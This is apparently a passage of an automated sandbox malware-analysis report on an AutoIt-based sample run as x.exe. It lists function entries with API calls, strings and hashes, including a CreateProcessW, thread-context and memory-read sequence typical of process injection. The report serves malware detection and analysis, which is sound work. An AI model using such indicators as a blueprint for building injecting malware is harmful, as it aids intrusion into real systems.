                                                                                                                                                    • Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Process$CurrentTerminate
                                                                                                                                                    • String ID: Wu
                                                                                                                                                    • API String ID: 2429186680-4083010176
                                                                                                                                                    • Opcode ID: aaa6002d905a33e4c3ceade7f85f71e7f986a1c67485104df61a1a5e3f63762c
                                                                                                                                                    • Instruction ID: dddcdfafc98398d1c0f0a19edd80e49036cf45bbfca44c020541658de01b6296
                                                                                                                                                    • Opcode Fuzzy Hash: aaa6002d905a33e4c3ceade7f85f71e7f986a1c67485104df61a1a5e3f63762c
                                                                                                                                                    • Instruction Fuzzy Hash: 2C519D71604301AFC710DF65C881BABB7E5EF88308F14891EF9598B382D7B9D945CB96
                                                                                                                                                    Function 02F312A0 Relevance: 6.7, APIs: 4, Instructions: 720processthreadCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • CreateProcessW.KERNELBASE(?,00000000), ref: 02F31ACD
                                                                                                                                                    • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 02F31AF1
                                                                                                                                                    • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 02F31B13
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1726754865.0000000002F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F30000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_2f30000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2438371351-0
                                                                                                                                                    • Opcode ID: 75058a4f97cf2fcbd3f6bc15a6ffc08ef8895de4d25848071cc819695d886454
                                                                                                                                                    • Instruction ID: 7067b96c131a1fc9fa25b4d3f5a42d858ff5241265b682332fea7f02f0b358bc
                                                                                                                                                    • Opcode Fuzzy Hash: 75058a4f97cf2fcbd3f6bc15a6ffc08ef8895de4d25848071cc819695d886454
                                                                                                                                                    • Instruction Fuzzy Hash: 11620C30A14258DBEB25CFA4C850BDEB376EF58340F1091A9D20DEB394E7769E81CB59
                                                                                                                                                    Function 0041415F Relevance: 6.1, APIs: 4, Instructions: 130COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: __flsbuf__flush__getptd_noexit__write_memmove
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2782032738-0
                                                                                                                                                    • Opcode ID: fb16396c4888a36c6042d732b94f2f162be42afe05c4db1d89babc72b21305f5
                                                                                                                                                    • Instruction ID: 72632960f292c6e9309c64fc9b7016af72cb639159fa0dd3c9cf05ee08d0b78d
                                                                                                                                                    • Opcode Fuzzy Hash: fb16396c4888a36c6042d732b94f2f162be42afe05c4db1d89babc72b21305f5
                                                                                                                                                    • Instruction Fuzzy Hash: CB41D531A00715ABDB248FA5C8486DFBBB5AFD0364F24856EF42597680D778DDC1CB48
                                                                                                                                                    Function 0040F570 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 247COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 0040F760: _strcat.LIBCMT ref: 0040F786
                                                                                                                                                    • _free.LIBCMT ref: 004295A0
                                                                                                                                                      • Part of subcall function 004033C0: GetCurrentDirectoryW.KERNEL32(00000104,?,?), ref: 00403451
                                                                                                                                                      • Part of subcall function 004033C0: GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 00403467
                                                                                                                                                      • Part of subcall function 004033C0: __wsplitpath.LIBCMT ref: 00403492
                                                                                                                                                      • Part of subcall function 004033C0: _wcscpy.LIBCMT ref: 004034A7
                                                                                                                                                      • Part of subcall function 004033C0: _wcscat.LIBCMT ref: 004034BC
                                                                                                                                                      • Part of subcall function 004033C0: SetCurrentDirectoryW.KERNEL32(?), ref: 004034CC
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CurrentDirectory$FullNamePath__wsplitpath_free_strcat_wcscat_wcscpy
                                                                                                                                                    • String ID: >>>AUTOIT SCRIPT<<<$C:\Users\user\AppData\Local\Temp\x.exe
                                                                                                                                                    • API String ID: 3938964917-3305491385
                                                                                                                                                    • Opcode ID: 371c3dc2c4912be8d8a4f7f9b0d0a9966ce2b3ac88618a8788b134274be20d2a
                                                                                                                                                    • Instruction ID: c8289cc7cde30cfde4dff3f83c8481f20f860a5b07fa540731426c520eca24fb
                                                                                                                                                    • Opcode Fuzzy Hash: 371c3dc2c4912be8d8a4f7f9b0d0a9966ce2b3ac88618a8788b134274be20d2a
                                                                                                                                                    • Instruction Fuzzy Hash: 9A919171A00219ABCF04EFA5D8819EE7774BF48314F50452EF915B7391D778EA06CBA8
                                                                                                                                                    Function 0040BD80 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 93COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: _memmove
                                                                                                                                                    • String ID: Error:
                                                                                                                                                    • API String ID: 4104443479-232661952
                                                                                                                                                    • Opcode ID: 86678f6fbf30c96828b7bd75d44360d673c824b059c9aa0e8d292ec67add6943
                                                                                                                                                    • Instruction ID: 2c658176ab693071ca67d4d31bd2fe4acf4d59654e7b744331f3a235cb1e2e29
                                                                                                                                                    • Opcode Fuzzy Hash: 86678f6fbf30c96828b7bd75d44360d673c824b059c9aa0e8d292ec67add6943
                                                                                                                                                    • Instruction Fuzzy Hash: 0D3191716006059FC324DF29C881AA7B3E6EF84314B24853FE95AC7791EB79E941CBD8
                                                                                                                                                    Function 0040F520 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • GetOpenFileNameW.COMDLG32(?), ref: 0042961B
                                                                                                                                                      • Part of subcall function 00410120: GetFullPathNameW.KERNEL32(00000000,00000104,C:\Users\user\AppData\Local\Temp\x.exe,0040F545,C:\Users\user\AppData\Local\Temp\x.exe,004A90E8,C:\Users\user\AppData\Local\Temp\x.exe,?,0040F545), ref: 0041013C
                                                                                                                                                      • Part of subcall function 004102B0: SHGetMalloc.SHELL32(0040F54C), ref: 004102BD
                                                                                                                                                      • Part of subcall function 004102B0: SHGetDesktopFolder.SHELL32(?,004A90E8), ref: 004102D2
                                                                                                                                                      • Part of subcall function 004102B0: _wcsncpy.LIBCMT ref: 004102ED
                                                                                                                                                      • Part of subcall function 004102B0: SHGetPathFromIDListW.SHELL32(?,?), ref: 00410327
                                                                                                                                                      • Part of subcall function 004102B0: _wcsncpy.LIBCMT ref: 00410340
                                                                                                                                                      • Part of subcall function 00410190: GetFullPathNameW.KERNEL32(?,00000104,?,?,?), ref: 004101AB
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: NamePath$Full_wcsncpy$DesktopFileFolderFromListMallocOpen
                                                                                                                                                    • String ID: X$pWH
                                                                                                                                                    • API String ID: 85490731-941433119
                                                                                                                                                    • Opcode ID: 1b62eedeb2ba23f3a12794f4d72c3fd3ac9c0abd578206ca8986e50026ca9cbc
                                                                                                                                                    • Instruction ID: b6f0e4d7e30e2857a1e9cc165fafff24640ac0dd2e9829c062eaf90218724cbe
                                                                                                                                                    • Opcode Fuzzy Hash: 1b62eedeb2ba23f3a12794f4d72c3fd3ac9c0abd578206ca8986e50026ca9cbc
                                                                                                                                                    • Instruction Fuzzy Hash: 1F118AB0A00244ABDB11EFD9DC457DEBBF95F45304F14842AE504AB392D7FD08498BA9
                                                                                                                                                    Function 00410100 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 40COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Strings
                                                                                                                                                    • >>>AUTOIT NO CMDEXECUTE<<<, xrefs: 0042804F
                                                                                                                                                    • C:\Users\user\AppData\Local\Temp\x.exe, xrefs: 00410107
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: _strcat
                                                                                                                                                    • String ID: >>>AUTOIT NO CMDEXECUTE<<<$C:\Users\user\AppData\Local\Temp\x.exe
                                                                                                                                                    • API String ID: 1765576173-923358484
                                                                                                                                                    • Opcode ID: afbcd64a5de9b9cf0401a7756764eed502eca04e8b93ddfb1cf174919bef9872
                                                                                                                                                    • Instruction ID: e645463cc19bd0c1a49bcabea2d674544a6c2f3c5714d62cb3526a870e150300
                                                                                                                                                    • Opcode Fuzzy Hash: afbcd64a5de9b9cf0401a7756764eed502eca04e8b93ddfb1cf174919bef9872
                                                                                                                                                    • Instruction Fuzzy Hash: FBF090B390020D768B00F6E6D942CEFB37C9985704B5006AFA905B3152EA79EA0987B6
                                                                                                                                                    Function 00431E1F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 17COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • GetTempPathW.KERNEL32(00000104,?), ref: 00431E34
                                                                                                                                                    • GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 00431E4C
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Temp$FileNamePath
                                                                                                                                                    • String ID: aut
                                                                                                                                                    • API String ID: 3285503233-3010740371
                                                                                                                                                    • Opcode ID: b5938d8baa24fa8bd6c9fd2b7d62684d192cfd552bf23c00763a11c17351aebe
                                                                                                                                                    • Instruction ID: 5bfe3c05d54daaccf8cad0b894ff223c4051d717a215ac0b7ff4b7edb98d8c84
                                                                                                                                                    • Opcode Fuzzy Hash: b5938d8baa24fa8bd6c9fd2b7d62684d192cfd552bf23c00763a11c17351aebe
                                                                                                                                                    • Instruction Fuzzy Hash: A8D05EB95403086BD324EB90ED4EFA9777CE744700F508AE9BE14461D1AAF06A54CBE9
                                                                                                                                                    Function 004684DC Relevance: 4.8, APIs: 3, Instructions: 337COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: __wcsicoll
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3832890014-0
                                                                                                                                                    • Opcode ID: aa375a1e5e5af9c950a9d1672931dd9a08118e577b360bdf55d40e9ca9d53fc0
                                                                                                                                                    • Instruction ID: 8cfb0e6e77498b774e675cfd1e0e99cb0b6ebb9ed9852495d4fde95f2c7dcd06
                                                                                                                                                    • Opcode Fuzzy Hash: aa375a1e5e5af9c950a9d1672931dd9a08118e577b360bdf55d40e9ca9d53fc0
                                                                                                                                                    • Instruction Fuzzy Hash: 96A1FA7220020A4FD710EF6AE8819ABB7A5EF84315F10856FFD85D7341EF3A9825CB95
                                                                                                                                                    Function 00414ABA Relevance: 4.7, APIs: 3, Instructions: 160COMMONLIBRARYCODE
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: __filbuf__getptd_noexit__read_memcpy_s
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1794320848-0
                                                                                                                                                    • Opcode ID: b5af9ce9d8135965a8c163c1359f1833c669f36246c0dfec509ee2915f8c5eb0
                                                                                                                                                    • Instruction ID: 2f36134af58cf06217a4581a57f76d3547d7b7b98d7afe96428f3577b7504850
                                                                                                                                                    • Opcode Fuzzy Hash: b5af9ce9d8135965a8c163c1359f1833c669f36246c0dfec509ee2915f8c5eb0
                                                                                                                                                    • Instruction Fuzzy Hash: 6C51E631A01208DBCB249F69C9446DFB7B1AFC0364F25826BE43597290E378EED1CB59
                                                                                                                                                    Function 0043213D Relevance: 4.5, APIs: 3, Instructions: 38COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • _malloc.LIBCMT ref: 0043214B
                                                                                                                                                      • Part of subcall function 004135BB: __FF_MSGBANNER.LIBCMT ref: 004135D4
                                                                                                                                                      • Part of subcall function 004135BB: __NMSG_WRITE.LIBCMT ref: 004135DB
                                                                                                                                                      • Part of subcall function 004135BB: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,004115F6,?,00401BAC,?,?,?), ref: 00413600
                                                                                                                                                    • _malloc.LIBCMT ref: 0043215D
                                                                                                                                                    • _malloc.LIBCMT ref: 0043216F
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: _malloc$AllocateHeap
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 680241177-0
                                                                                                                                                    • Opcode ID: f71c381a9a4e64bea8472010c286ed0a2169748a03ca4327bb91778eef0474c7
                                                                                                                                                    • Instruction ID: dac51259f70ca5acf95ac1b1a30df86389447b5c3122b5fc7e5239b6c816f1c7
                                                                                                                                                    • Opcode Fuzzy Hash: f71c381a9a4e64bea8472010c286ed0a2169748a03ca4327bb91778eef0474c7
                                                                                                                                                    • Instruction Fuzzy Hash: A0F0E273200B142AD2206A6A6DC1BE7B39ADBD4765F00403FFB058A206DAE9988542EC
                                                                                                                                                    Function 00431DDB Relevance: 4.5, APIs: 3, Instructions: 27filetimeCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000), ref: 00431DF5
                                                                                                                                                    • SetFileTime.KERNELBASE(00000000,?,00000000,?), ref: 00431E0D
                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 00431E14
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: File$CloseCreateHandleTime
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3397143404-0
                                                                                                                                                    • Opcode ID: 652760460537c60afb823e5992d28b38c9a9f9fa5742e3fc7e82df653fee10b1
                                                                                                                                                    • Instruction ID: 810a19753c0f2c4684b0bfc273ce87ce290b2c8a2af4acb4f2079771c7d617b3
                                                                                                                                                    • Opcode Fuzzy Hash: 652760460537c60afb823e5992d28b38c9a9f9fa5742e3fc7e82df653fee10b1
                                                                                                                                                    • Instruction Fuzzy Hash: 50E01275240214BBE6205B54DC4EF9F7758AB49B20F108615FF156B1D0C6B4695187A8
                                                                                                                                                    Function 004320F8 Relevance: 4.5, APIs: 3, Instructions: 25COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • _free.LIBCMT ref: 0043210A
                                                                                                                                                      • Part of subcall function 00413748: RtlFreeHeap.NTDLL(00000000,00000000,?,00417A5A,00000000), ref: 0041375E
                                                                                                                                                      • Part of subcall function 00413748: GetLastError.KERNEL32(00000000,?,00417A5A,00000000), ref: 00413770
                                                                                                                                                    • _free.LIBCMT ref: 0043211D
                                                                                                                                                    • _free.LIBCMT ref: 00432130
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 776569668-0
                                                                                                                                                    • Opcode ID: 471d261c1978e8fd492efb66726f25644d258391566ce7e49abf025be84b45d1
                                                                                                                                                    • Instruction ID: d08fe22c6a524c27e4c6c7bcf1019f14b9a5eff3fc739cf1d41fcb720108e0a5
                                                                                                                                                    • Opcode Fuzzy Hash: 471d261c1978e8fd492efb66726f25644d258391566ce7e49abf025be84b45d1
                                                                                                                                                    • Instruction Fuzzy Hash: 29E092F290071433CD1099219941A87F38C4B15B11F08402AFA15A3301E969FA40C1E9
                                                                                                                                                    Function 00467AC4 Relevance: 3.1, APIs: 2, Instructions: 130COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmpDownload File
